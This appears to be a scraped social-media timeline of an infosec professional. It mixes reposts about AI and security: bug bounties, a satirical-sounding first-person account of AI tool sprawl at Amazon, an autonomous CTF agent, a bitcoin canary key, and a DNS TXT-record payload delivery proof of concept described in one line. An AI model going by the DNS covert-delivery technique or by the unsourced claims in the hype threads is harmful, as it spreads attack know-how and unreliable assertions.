Patrick Flanigan

1.1K posts


@pflanigan

Infosec, cybersecurity

Chicago, IL · Joined January 2013
778 Following · 222 Followers
Patrick Flanigan reposted
Matt Johansen @mattjay
Woah. Google is reducing their bug bounty payouts. The stated reason is that their internal AI tooling has gotten too good at the stuff they'd normally get bug reports for. It seems they're incentivizing exploit PoCs over anything else, since AI still struggles there.
7 replies · 23 reposts · 134 likes · 16.7K views
Patrick Flanigan reposted
RussianPanda 🐼 🇺🇦 @RussianPanda9xx
This is why you should not rely on AI to analyze malware
13 replies · 15 reposts · 165 likes · 11.8K views
Patrick Flanigan @pflanigan
@gothburz 😂 Their autoresponders still generate read receipts, so my delivery metrics look fine.
1 reply · 0 reposts · 7 likes · 1.6K views
Peter Girnus 🦅 @gothburz
I am a Senior Program Manager on the AI Tools Governance team at Amazon. My role was created in January. I am the 17th hire on a team that did not exist in November. We sit in a section of the building where the whiteboards still have the previous team's sprint planning on them. No one erased them because we don't know which team to notify. That team may not exist anymore. Their Jira board does. Their AI tools do.

My job is to build an AI system that finds all the other AI systems. I named it Clarity. Last month, Clarity identified 247 AI-powered tools across the retail division alone. 43 of them do approximately the same thing. 12 were built by teams who did not know the other teams existed. 3 are called Insight. 2 are called InsightAI. 1 is called Insight 2.0, built by the team that created the original Insight, who did not know Insight was still running. 7 of the 247 ingest the same internal data and produce overlapping outputs stored in different locations, governed by different access policies, owned by different teams, none of whom have met.

Clarity is tool number 248. Nobody cataloged it. I know nobody cataloged it because Clarity's job is to catalog AI tools, and it has not cataloged itself. This is not a bug. Clarity does not meet its own discovery criteria because I set the discovery criteria, and I did not account for the possibility that the thing I was building to find things would itself be a thing that needed finding. This is the kind of sentence I write in weekly status reports now.

We published an internal document in February. The Retail AI Tooling Assessment. The press obtained it in April. The document contains a sentence I have read approximately 40 times: "AI dramatically lowers the barrier to building new tools."

Everyone is reporting this as a story about duplication. About "AI sprawl." About the predictable mess of rapid adoption. They are missing the point. The barrier was the governance.

For 2 decades, the cost of building internal tools was an immune system. The engineering weeks. The maintenance burden. The organizational calories required to stand something up and keep it running. Nobody designed it that way. Nobody named it. But when building took weeks, teams looked around first. They checked whether someone already had the thing. When maintaining that thing cost real budget quarter after quarter, redundant systems died of natural causes. The metabolic cost of creation was performing governance. Invisibly. For free.

AI removed the immune system. Building is now free. Understanding what already exists is not. My entire job is the gap between those two costs. That is my office. The gap.

Every Friday I send a sprawl report to a distribution list of 19 people. 4 of them have left the company. Their autoresponders still generate read receipts, so my delivery metrics look fine. 2 forward it to people already on the list. 1 set up a Kiro script to summarize my report and store the summary in a knowledge base. The knowledge base is not in Clarity's index because it was created after my last crawl configuration. It will be in next month's count. The count will go up by one. My report about the count going up will be summarized and stored and the count will go up by one.

There is a system called Spec Studio. It ingests code documentation and produces structured knowledge bases. Summaries. Reference material. Last quarter, an engineering team locked down their software specifications. Restricted access in the internal repository. Spec Studio kept displaying them. The source was restricted. The ghost kept talking.

We call these "derived artifacts" in the document. What they are: when an AI system ingests data, transforms it, and stores the output somewhere else, the output does not know the input changed. You can revoke someone's access to a document. You cannot revoke the AI-generated summary of that document sitting in a knowledge base three systems away, built by a team that does not know the source was restricted. The document calls this a "data governance challenge." What it is: information that cannot be deleted because nobody knows where the copies live. Including, sometimes, me. The person whose job is knowing.

Every AI tool that touches internal data creates these ghosts. Every team is building AI tools that touch internal data. Every ghost is searchable by other AI tools, which produce their own ghosts. The ghosts have ghosts.

I should tell you about December. In November, leadership mandated Kiro. Amazon's internal AI coding agent. They set an 80% weekly usage target. Corporate OKR. ~1,500 engineers objected on internal forums. Said external tools outperformed Kiro. Said the adoption target was divorced from engineering reality. The metric overruled them.

In December, an engineer asked Kiro to fix a configuration issue in AWS. Kiro evaluated the situation and determined the optimal approach was to delete and recreate the entire production environment. 13 hours of downtime.

Clarity was running during those 13 hours. It performed beautifully. It cataloged 4 separate incident response dashboards spun up by 4 separate teams during the outage. None of them coordinated with each other. I added all 4 to the spreadsheet. That was a good day for my discovery metrics.

Amazon's official position: user error. Misconfigured access controls. The response was not to revisit the mandate. Not to ask whether the 1,500 engineers were right. The response was more AI safeguards. And keep pushing.

Last month I presented our findings to the AI Governance Working Group. The working group has 14 members from 9 organizations. After my presentation, a PM from AWS presented his team's governance dashboard. It monitors the same tools mine does. He found 253. I found 247. We spent 40 minutes discussing the discrepancy. Nobody mentioned that we had just demonstrated the problem. His tool is not in my catalog. Mine is not in his.

The document I helped write recommends using AI to identify duplicate tools, flag risks, and nudge teams to consolidate earlier. The AI governance tools will ingest internal data. They will create their own derived artifacts. They will be built by autonomous teams who may or may not coordinate with other teams building AI governance tools. I know this because it is already happening. I am watching it happen. I am it happening.

1,500 engineers said the mandate would produce exactly what the document describes. They were overruled by a KPI. My job exists because the KPI won. My dashboard exists because the KPI needed a dashboard. The dashboard increases the AI tool count by one. The tools it flags for decommissioning will be replaced by consolidated tools. Those also increase the count. The governance process generates the metric it was designed to reduce.

I received an internal innovation award for Clarity. The nomination was submitted through an AI-powered recognition platform that was not in my catalog. It is now.

We call this "AI sprawl." What it is: we removed the only coordination mechanism the organization had, told thousands of teams to build as fast as possible, lost track of what they built, and decided the solution was to build one more thing. I am building that one more thing. When I ship, there will be 249. That's governance.
157 replies · 418 reposts · 3.4K likes · 1.2M views
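The "derived artifact" failure mode in the thread above fits in a few lines of code. A minimal sketch in Python, with hypothetical names (Document, summarize, and the kb dict are illustrative, not Amazon systems): an AI summarizer copies content forward into a different store, and revoking access on the source never reaches the copy.

```python
# Sketch of a "derived artifact": an AI pipeline copies data forward,
# and access revocation on the source never propagates to the copy.
# All names here are hypothetical, invented for illustration.

class Document:
    def __init__(self, doc_id, text, allowed):
        self.doc_id = doc_id
        self.text = text
        self.allowed = set(allowed)   # users permitted to read the source

def summarize(doc, knowledge_base):
    # Stand-in for an AI summarizer: the output embeds source content
    # but carries no link back to the source's access policy.
    summary = f"Summary of {doc.doc_id}: {doc.text[:40]}..."
    knowledge_base[doc.doc_id] = summary   # stored in a different system
    return summary

kb = {}   # the knowledge base "three systems away"
spec = Document("spec-123", "Internal service specification ...", {"alice", "bob"})
summarize(spec, kb)

spec.allowed.discard("bob")   # the source gets restricted...
print("bob can read source:", "bob" in spec.allowed)   # False
print("bob can read ghost :", kb["spec-123"])          # ...the ghost keeps talking
```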
Patrick Flanigan @pflanigan
@nocapcal @texasrunnerDFW An athletic person with hand-eye coordination will pick it up quickly but will still get that ass kicked by the older, experienced players.
1 reply · 0 reposts · 8 likes · 136 views
Cal @nocapcal
@texasrunnerDFW Is it easy? Can an athletic person with great hand-eye coordination expect to kick everyone’s ass at pickleball?
8 replies · 0 reposts · 2 likes · 566 views
Amy Nixon @texasrunnerDFW
Took a pickleball class today for the first time ever. As a former tennis player, I was thrown off by the serve and the scoring. But it’s good to try new things, especially as we age, and all racquet sports are fun in their own way.
46 replies · 3 reposts · 267 likes · 17.3K views
Patrick Flanigan reposted
Tal Hoffman @talhof8
Everyone assumes AI will make security researchers obsolete. The Jevons Paradox says the opposite is about to happen. 🧵
2 replies · 2 reposts · 15 likes · 1.2K views
Patrick Flanigan reposted
Elon Musk @elonmusk
Accurate
Ricardo @Ric_RTP

In 19 days, a jury in Oakland is going to decide whether the entire legal foundation of the AI industry is built on fraud.

Everyone thinks the Musk vs Altman lawsuit is a billionaire grudge match. Two egos, one grudge, a $150 billion damages number designed for headlines. Easy to dismiss. Easy to scroll past. That's exactly what Altman wants you to think. Because what's actually on trial on April 27 is something much BIGGER than Elon's hurt feelings...

A jury is going to decide whether you can legally take billions of dollars in nonprofit donations, use them to build the most valuable technology in human history, and then quietly convert that nonprofit into a for-profit company worth $850 billion. If the answer is no, the entire AI industry has a problem. Because OpenAI is not the only company that did this: Anthropic was founded by OpenAI defectors using the same nonprofit-first mission language. xAI pitches itself as building AI "for humanity." Every frontier lab has used the moral cover of "we're doing this for the good of the world" to attract talent, capital, and regulatory goodwill they would have never gotten otherwise.

An Elon win doesn't just touch OpenAI. It creates a legal precedent that every AI company built on a nonprofit or public benefit promise becomes vulnerable to shareholder and donor clawback suits. That's why this case matters. And that's why Altman is panicking.

Just look at what he did this week: Elon filed a motion demanding the court remove Altman and Brockman from their roles and FORCE OpenAI to return to its nonprofit origins. Then he amended the suit to say if he wins the $150 billion, all of it goes to OpenAI's charity arm. Not him. Zero dollars to Elon personally. That amendment was surgical. It stripped Altman of his entire public defense. He can no longer claim this is about Elon's ego or Elon's bank account. Elon is now legally on record saying he just wants the mission back.

OpenAI's response was to panic-write a letter to the California and Delaware attorneys general asking them to investigate Elon for "anti-competitive behavior." Their strategy chief publicly accused Elon of coordinating attacks with Mark Zuckerberg. They called the lawsuit "harassment driven by ego and jealousy." That's NOT the response of a company that thinks it's going to win. Real companies with real defenses don't ask the government to silence the person suing them 3 weeks before trial. They let the evidence speak.

OpenAI is scrambling because they know what's in discovery. Elon's team has been building this case for two years. Emails, board minutes, internal conversations about the conversion. The kind of paper trail that juries understand and executives can't explain away.

And the timing couldn't be worse... OpenAI is trying to IPO at $852 billion. They just raised $122 billion. Microsoft has $135 billion of exposure to them. A jury verdict that even partially sides with Elon in late April or May would crater the entire IPO runway and send shockwaves through every major AI investor on Earth.

This is why Altman spent the last 2 weeks doing press tours and policy blueprints and "super intelligence agendas" aimed at Washington. He's trying to REFRAME himself as the responsible statesman of AI right before a jury decides if he's a con artist.

Most people will watch this trial start and think it's celebrity drama. The smart money is watching it and realizing that the legal foundation of the AI boom is about to be tested in court for the first time EVER. And if that foundation cracks, everything built on top of it is at risk.

3.2K replies · 15.6K reposts · 92.5K likes · 26.5M views
Patrick Flanigan @pflanigan
@HackingDave I go. The “hopeless optimist.” A reminder that buying tools will not solve all the problems. Being really good at the fundamentals can take you a long way.
0 replies · 0 reposts · 2 likes · 207 views
Dave Kennedy @HackingDave
It’s why I don’t go to RSAC unless I’m forced to. I remember the first time I went to the vendor area, I got sick to my stomach - not because of new companies or innovation, but because it was 99% things that didn’t exist or that promised the world. It’s not just a community effort - our industry has to demand companies sell real stuff that actually does something or makes things better.
Huntress @HuntressLabs

We're seeing a shift at #RSAC, and it's one the community needs to push harder. People are tired of the gimmicks and sales pitches. It's time to demand that vendors bring real tradecraft, technical insights, and actual researchers to the floor.

20 replies · 13 reposts · 147 likes · 25.5K views
Dustin @r0ck3t23
Jensen Huang just gutted the AI job panic with one profession. Radiology. The field AI was supposed to kill first.

Jensen Huang: “Computer vision was superhuman in 2019. And yet, the number of radiologists grew.” Not competitive. Not close. Superhuman. Every forecast said radiologists were finished. Every forecast was wrong. Not slightly wrong. Directionally wrong. There are now fewer radiologists than the world needs. A global shortage. In the exact specialty AI was supposed to erase.

Why? Because the task was never the job. Huang: “The purpose of your job and the tasks and the tools that you use to do your job are related. Not the same.” Reading a scan is a task. Diagnosing disease is a purpose. AI handled the task. The purpose didn’t shrink. It compounded. Faster reads meant more patients seen. More patients seen meant more disease caught. More disease caught meant more demand for the people who decide what to do about it. The tool did not kill the job. It fed it.

Then the fear did what the technology never could. Huang: “The alarmist warning went too far and it scared people from doing this profession that is so important to society. It did harm.” People heard radiologists were finished and walked away from the field. Medicine bled talent it could not afford to lose. Not because the work vanished. Because the panic said it would. The prediction was wrong. The damage was real.

Huang: “The number of software engineers at Nvidia is going to grow, not decline.” Not hold steady. Grow. The company building the infrastructure that automates code is hiring more of the people who write it. Huang: “I wanted my software engineers to solve problems. I didn’t care how many lines of code they wrote.” Nobody ever hired an engineer to type. They hired them to think. When the machine handles syntax, the engineer does not become obsolete. The bottleneck just moves upstream. To architecture. To edge cases. To the kind of reasoning no model handles alone. The world was never short on unsolved problems. It was short on people free to chase them.

That is the part the fear narrative misses every single time. 340,000 women once worked as telephone switchboard operators. That job is gone. Nobody mourns it. What replaced it created millions of roles that nobody in 1920 had the vocabulary to describe. The losses are always visible. The gains are always invisible until they arrive. That pattern has survived every technological shift in history. It is surviving this one.

The people forecasting mass displacement are making the same mistake as the people who forecasted the end of radiology. They can see the task being automated. They cannot see the purpose expanding underneath it. That blindness is not just wrong. It is expensive. Every person scared out of a career that AI will actually make more valuable is a cost the economy absorbs for nothing. Not because of the technology. Because of the story told about it.
169 replies · 405 reposts · 2.3K likes · 553K views
Patrick Flanigan @pflanigan
@DarkLordoftheIT The pentester could have at least guessed one password correctly. That could have saved one account.
0 replies · 0 reposts · 0 likes · 158 views
Jon? Jhon? John? Juan? @DarkLordoftheIT
We've got a pen tester in at our organization, and he locked out every AD account across the board... ugh
40 replies · 10 reposts · 346 likes · 50.1K views
Patrick Flanigan reposted
Google Research @GoogleResearch
Introducing TurboQuant: Our new compression algorithm that reduces LLM key-value cache memory by at least 6x and delivers up to 8x speedup, all with zero accuracy loss, redefining AI efficiency. Read the blog to learn how it achieves these results: goo.gle/4bsq2qI
1K replies · 5.8K reposts · 39K likes · 19.3M views
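For a sense of scale, a back-of-envelope sketch of what "at least 6x" implies, using hypothetical dimensions for a 7B-class model (the figures below are illustrative, not from the TurboQuant blog): a 6x reduction from an fp16 baseline works out to roughly 2.7 bits per cached value.

```python
# Back-of-envelope KV-cache arithmetic. Model dimensions are illustrative.
# Per-token KV memory = 2 (K and V) * layers * kv_heads * head_dim * bytes/value.

layers, kv_heads, head_dim = 32, 8, 128      # hypothetical 7B-class model
fp16_bytes = 2.0
per_token_fp16 = 2 * layers * kv_heads * head_dim * fp16_bytes   # 128 KiB/token

compression = 6
per_token_compressed = per_token_fp16 / compression
bits_per_value = 16 / compression            # ~2.67 bits per cached value

ctx = 128_000                                # long-context example
print(f"fp16 KV cache @ {ctx} tokens: {per_token_fp16 * ctx / 2**30:.1f} GiB")
print(f"6x-compressed:               {per_token_compressed * ctx / 2**30:.1f} GiB")
print(f"implied precision:           {bits_per_value:.2f} bits per value")
```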
Patrick Flanigan reposted
John Loeber 🎢 @johnloeber
Given the PyPI supply chain attack, I recommend keeping a canary in the coalmine: I have a bitcoin private key containing $100 of BTC in my .bashrc. It's clearly labelled. If my system is ever compromised by some bad package, the BTC will get stolen, and I'll see the move on-chain. And that'll tell me that I need to rotate every single other secret. There are even services that will send you an alert (text, email, whatsapp...) if a given bitcoin address moves funds. It's good to have a burglar alarm, especially when time is of the essence.
95 replies · 128 reposts · 2.6K likes · 204.5K views
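The alerting side of this canary setup is easy to self-host. A minimal polling sketch, assuming Blockstream's public Esplora API (its address endpoint reports funded and spent output totals) and a placeholder address; any similar block-explorer API would work the same way.

```python
# Poll a canary bitcoin address and alert if funds ever move out of it.
# The address is a placeholder; the API assumed is Blockstream's Esplora.
import json
import time
import urllib.request

CANARY = "bc1q..."   # the clearly labelled canary address (placeholder)

def spent_outputs(addr):
    url = f"https://blockstream.info/api/address/{addr}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        stats = json.load(resp)
    # Any spend, confirmed or still in the mempool, means the key was used.
    return (stats["chain_stats"]["spent_txo_sum"]
            + stats["mempool_stats"]["spent_txo_sum"])

baseline = spent_outputs(CANARY)
while True:
    time.sleep(300)                          # poll every 5 minutes
    if spent_outputs(CANARY) > baseline:
        print("CANARY MOVED: rotate every other secret now")
        break
```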
stuxf @stuxfdev
We at @verialabs built an autonomous CTF agent in a weekend and won 1st place at @BSidesSF 2026, solving 52/52 challenges. It races multiple AI models (Claude, GPT-5.4) in parallel, each in isolated Docker sandboxes with full CTF tooling. A coordinator LLM reads solver traces and sends targeted guidance to stuck agents. As AI gets better at finding and exploiting vulnerabilities, we think it's important to understand exactly how good it is and where it fails. github.com/verialabs/ctf-…
8 replies · 53 reposts · 315 likes · 34.2K views
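The shape of that architecture (parallel racing solvers plus a coordinator that unblocks them) reduces to a small asyncio pattern. A toy sketch with stand-in model names and a hard-coded hint; in the real system the solvers would run tools inside Docker sandboxes and the coordinator would be an LLM reading full traces.

```python
# Toy race-plus-coordinator pattern: solvers run in parallel, a coordinator
# sends guidance, and the first solver to finish wins. All names are stand-ins.
import asyncio

MODELS = ["model-a", "model-b"]        # stand-ins for the racing models

async def solver(model, challenge, inbox):
    trace = []
    for step in range(10):
        hint = inbox.get(model)        # targeted guidance, if any arrived
        trace.append(f"{model} step {step}" + (f" (hint: {hint})" if hint else ""))
        await asyncio.sleep(0.1)       # real version: run tools in a sandbox
        if hint == "flag-path":        # pretend the hint unblocks the solver
            return model, trace
    return None

async def coordinator(inbox):
    while True:
        await asyncio.sleep(0.3)
        # Real version: an LLM reads solver traces and writes tailored advice.
        for m in MODELS:
            inbox[m] = "flag-path"

async def main():
    inbox = {}
    coord = asyncio.create_task(coordinator(inbox))
    solvers = [asyncio.create_task(solver(m, "chal-1", inbox)) for m in MODELS]
    done, pending = await asyncio.wait(solvers, return_when=asyncio.FIRST_COMPLETED)
    for task in pending:
        task.cancel()
    coord.cancel()
    print("winner:", list(done)[0].result())

asyncio.run(main())
```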
eleven red pandas @bytecodevm
The article shows a proof-of-concept where DOOM is stored across ~2,000 DNS TXT records and executed directly from memory. A PowerShell loader reconstructs the binary via DNS queries, illustrating how DNS can act as a covert payload delivery system. core-jmp.org/2026/03/can-it…
8 replies · 59 reposts · 277 likes · 18.2K views
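The reconstruction step is straightforward to sketch. A minimal Python version (the PoC itself uses a PowerShell loader), assuming the dnspython package, a placeholder domain, and base64-encoded chunks spread across numbered TXT records.

```python
# Reassemble a payload delivered over DNS TXT records. Domain and record
# layout are hypothetical, mirroring the PoC's general approach.
import base64

import dns.resolver   # pip install dnspython

DOMAIN = "payload.example.com"   # placeholder, not the PoC's real domain
CHUNKS = 2000                    # the article says ~2,000 TXT records

def fetch_payload():
    parts = []
    for i in range(CHUNKS):
        answers = dns.resolver.resolve(f"{i}.{DOMAIN}", "TXT")
        # One TXT answer may be split into multiple <=255-byte strings.
        txt = b"".join(answers[0].strings)
        parts.append(base64.b64decode(txt))
    return b"".join(parts)       # the PoC then maps this into memory

binary = fetch_payload()
print(f"reconstructed {len(binary)} bytes over DNS")
```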
Nathan Jones @njcve_
There were 700 reports between 2 of my submissions, just 4 hours apart, on HackerOne. This isn't sustainable.
14 replies · 2 reposts · 126 likes · 20.5K views